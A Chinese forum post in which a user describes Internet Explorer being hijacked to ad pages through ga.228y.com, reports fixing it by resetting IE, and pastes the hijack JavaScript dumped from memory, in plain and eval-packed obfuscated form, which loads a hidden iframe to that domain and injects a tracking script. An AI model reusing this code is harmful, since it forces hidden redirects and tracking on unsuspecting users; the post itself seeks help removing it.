IE被p.5mnh.com劫持啦,发现主域名是ga.228y.com ,
在host文件里直接屏蔽这个域名,就不会在跳转到p.5mnh.com广告页面啦,但是流氓程序依然不知道是哪个,
接着分析发现IE打开下啦面这个地址
res://ieframe.dll/navcancl.htm#https://ga.228y.com/
原来是res协议,可以参考http://baike.baidu.com/view/1508651.html,
可能是被劫持了shdoclc.dll或ieframe.dll
于是打开IE设置,点击重置,问题解决
360卫士竟然都查不出来
从内存里dump啦一个下面的js代码,求解决办法
window.onerror = function () {return true;};
function _sC(name, value, expiry, path, domain, secure) {
var nameString = name + "=" + value;var expiryString = "";
if (expiry != null) {try {expiryString = "; expires=" + expiry.toGMTString();
} catch (e) {
if (expiry) {var lsd = new Date;lsd.setTime(lsd.getTime() + expiry * 1000);
expiryString = "; expires=" + lsd.toGMTString();}}}
var pathString = path == null ? " ;path=/" : " ;path = " + path;var domainString = domain == null ? "" : " ;
domain = " + domain;var secureString = secure ? ";secure=" : "";
document.cookie = nameString + expiryString + pathString + domainString + secureString;}
function _gC(name) {var CookieFound = false, start = 0, end = 0, CookieString = document.cookie;var i = 0;
while (i <= CookieString.length) {start = i;end = start + name.length;
if (CookieString.substring(start, end + 1) == name + "=") {CookieFound = true;break;}i++;}
if (CookieFound) {start = end + 1;end = CookieString.indexOf(";", start);if (end < start) {
end = CookieString.length;
}
return unescape(CookieString.substring(start, end));}
return "";}function _ui(u, d) {if (d == null) {d = document;}
var c = d.createElement("iframe");c.src = u;c.style.display = "none";document.body.appendChild(c);}
function _u2(u, d) {if (document.body) {_ui(u, d);}
else {window.setTimeout(function () {_u2(u, d);}, 100);}}
function _pdfilter(v) {return /(4818)|(5747)|(4836)|(37wan\.com)/i.test(v);}
function _us2(u) {document.writeln("<Script src=\"" + u + "\"></Script>");}
function r() {var _h = location.href;var __v_c = _gC("__v_c");
if (__v_c == "") {__v_c = 0;} else {__v_c = parseInt(__v_c);}
if (!_pdfilter(_h)) {if (++__v_c <= 3) {_sC("__v_c", __v_c, 10);_u2("http://ga.228y.com/");}}
else
{_us2("http://fb.37cs.com/feedback/track.php?step=2_");}}r(); ?
?
$(function(){
sroll(".gn-news-box", 1, 3000);
})
$("#gn-gl").hover(
function(){
$("#gn-gl-detail").show();
}, function(){
$("#gn-gl-detail").hide();
}
)
$("#show-gnbar").click(function(){
$('.sidebar,.arrow-item,#game_content_frame').height($(window).height() - $(".show_bar").height());
$("#gnbar-ul,#gnbar-ul li").slideUp();
$(".show_bar").slideDown();
if($.browser.msie && ($.browser.version == "7.0" || $.browser.version == "6.0")){
setTimeout(function(){
windowInit();
$('#game_content_frame').width(++gframeWidth);
},500);
}
})
$(".show_bar").hover(function(){
$(this).addClass("bgcolor2");
},function(){
$(this).removeClass("bgcolor2");
})
$(".show_bar").click(function(){
$('.sidebar,.arrow-item,#game_content_frame').height($(window).height() - $("#gnbar-ul").height());
$("#gnbar-ul,#gnbar-ul li").slideDown();
$(".show_bar").slideUp();
if($.browser.msie && ($.browser.version == "7.0" || $.browser.version == "6.0")){
setTimeout(function(){
windowInit();
$('#game_content_frame').width(++gframeWidth);
},500);
}
})
var sroll = function(box, len, Time){
var $this = $(box);
var scrollTimer;
$this.hover(function(){
clearInterval(scrollTimer);
}, function(){
scrollTimer = setInterval(function()
{
scrollCon( $this );
},Time);
}).trigger("mouseleave");
function scrollCon(obj){
var $self = $(obj).find("ul:first");
var lineHeight = $self.find("li:first").height();
$self.animate({"marginTop":-lineHeight + "px"}, 600, function(){
$self.css({marginTop:0}).find("li:first").appendTo($self);
})
}
}
还有一段
eval((function(x){var d="";var p=0;while(p<x.length){if(x.charAt(p)!="`")d+=x.charAt(p++);else{var l=x.charCodeAt(p+3)-28;if(l>4)d+=d.substr(d.length-x.charCodeAt(p+1)*96-x.charCodeAt(p+2)+3104-l,l);else d+="`";p+=4}}return d})("window.onerror = function () {return true;};` 2%_sC(name, value, expiry, path, domain, secure) {var nameString =` (! + \"=\" +` ^\";var` `#` =%\"\";if (` 0\" != null) {try {` <,;` X\"es` o!` 8\".toGMT` >\"();} catch (e) {` p&`!Z#lsd = new Date;lsd.setTime(lsd.g` %#)` u% * 1000);`!-:lsd`!8,}}var`#(!` L%path =`\"=\" ? \" ;path=/\" :` %$ = \" +` E!`#)!`#a\"` Y%` )\"` X(` U#` 1$` Y!` '\"` [!`$9\"` W%` )\" ? \";` %\"=` [!\";document.cookie`$X#` Q#`\"e$` &%`\"+'`!&$` &%`!&(;}`&%&g`&)\"`$\"#C`!\"!Found = false, start = 0, e` 3!0,` B#`\"V'`![)`\"?!i = 0;while (i <=` H).length) {` w$i;` x\"` *\"+`\"E!` ?#`&g!` Q)subs`$n\"` J!`!T\"+ 1)`$ !`'Z%) {`\"%*`(j!break;}i++;}` p&` >!`!E'` k#`!O#`!1)indexOf(\";\"`\"x#)`(I\"nd <` *# {` F/`\"(#}`*6#unescape`!z>))` L%\"\"`$T(ui(u, d`(o#d`&\\$) {d`$-';`'q!c = d.createElement(\"iframe\");c.src = u;c.style.display = \"none`&d'body.appendChild(c)`!H)2`!H)` J() {`!k%;} else {`-C#`*M#out(`->)` g%;}, 100);}`!\"'pdfilter(v`-l&/(4818)|(5747)|(4836)|(37wan\\.com)/i.test(v`!k*s2(u) {`!j%writeln(\"<Script src=\\\"\" + u + \"\\\"></` 5\">\"` _(r(`(l#_h = location.href`(9!__v_c =`)<!\"` (!\"`%~\"` 2#= \"\") {` ?$0`##%` *$parseInt` K\")`'D\"!`\"d&_h)`#y#++` N\"<= 3) {_s`!)%,`!A\", 10);_u2(\"http://ga.228y.com/\");}`!4%us` ;&fb.37cs` @!feedback/track.php?step=2_` Z!r();"))
[培训]内核驱动高级班,冲击BAT一流互联网大厂工作,每周日13:00-18:00直播授课